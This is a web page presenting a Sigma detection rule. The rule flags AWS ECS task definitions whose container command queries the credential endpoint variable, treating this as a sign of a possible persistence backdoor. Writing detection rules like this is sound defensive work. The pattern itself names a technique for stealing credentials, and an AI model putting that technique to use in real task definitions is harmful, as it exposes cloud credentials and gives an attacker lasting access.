AWS ECS Task Definition That Queries The Credential Endpoint

Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

Sigma rule (View on GitHub)

 1title: AWS ECS Task Definition That Queries The Credential Endpoint
 2id: b94bf91e-c2bf-4047-9c43-c6810f43baad
 3status: experimental
 4description: |
 5    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.
 6    This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.    
 7references:
 8    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py
 9    - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html
10    - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html
11author: Darin Smith
12date: 2022/06/07
13modified: 2023/04/24
14tags:
15    - attack.persistence
16    - attack.t1525
17logsource:
18    product: aws
19    service: cloudtrail
20detection:
21    selection:
22        eventSource: 'ecs.amazonaws.com'
23        eventName:
24            - 'DescribeTaskDefinition'
25            - 'RegisterTaskDefinition'
26            - 'RunTask'
27        requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
28    condition: selection
29falsepositives:
30    - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons
31level: medium

Related rules

to-top